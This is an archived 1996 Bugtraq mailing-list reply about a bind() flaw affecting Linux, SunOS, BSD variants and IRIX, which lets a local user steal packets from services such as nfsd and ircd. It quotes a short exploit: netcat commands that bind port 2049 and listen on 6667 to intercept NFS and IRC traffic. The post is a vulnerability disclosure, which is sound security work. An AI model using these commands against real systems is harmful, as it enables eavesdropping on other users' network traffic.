Bugtraq mailing list archives
Re: BoS: bind() Security Problems
From: Bernd.Lehle () RUS Uni-Stuttgart DE (Bernd Lehle)
Date: Wed, 31 Jan 1996 13:18:29 +0100
System Call: bind() Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix Probably others. Requirement: account on system. Security Compromise: Stealing packets from nfsd, yppasswd, ircd, etc. Credits: *Hobbit* <hobbit () avian org> bitblt <bitblt () infosoc com> Aleph One <aleph1 () underground org> Synopsis: bind() does not properly check to make sure there is not a socket already bound to INADDR_ANY on the same port when binding to a specific address.
IRIX 5.3 is vulnerable, too.
Exploit:
[..]
Run netcat: w00p% nc -v -v -u -s 192.88.209.5 -p 2049 listening on [192.88.209.5] 2049 ...
To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667 --
Bernd Lehle - Stuttgart University Computer Center * A supercomputer < Visualization / SFB 382 / Astrophysics * is a machine < lehle () rus uni-stuttgart de Tel:+49-711-685-5531 * that runs an < http://www.tat.physik.uni-tuebingen.de/~lehle * endless loop < pgp? -> finger bernd () visbl rus uni-stuttgart de * in 2 seconds <
Current thread:
- XFree86 3.1.2 Security Problems David J Meltzer (Jan 28)
- Re: XFree86 3.1.2 Security Problems David Dawes (Jan 28)
- Re: XFree86 3.1.2 Security Problems Anthony C. Zboralski (Jan 29)
- bind() Security Problems Aleph's K-Rad GECOS Field (Jan 30)
- SGI Security Advisory 19960102-01-P, SGI Security Coordinator (Jan 30)
- Aiiiieeee!! *Hobbit* (Jan 30)
- Re: BoS: bind() Security Problems Bernd Lehle (Jan 31)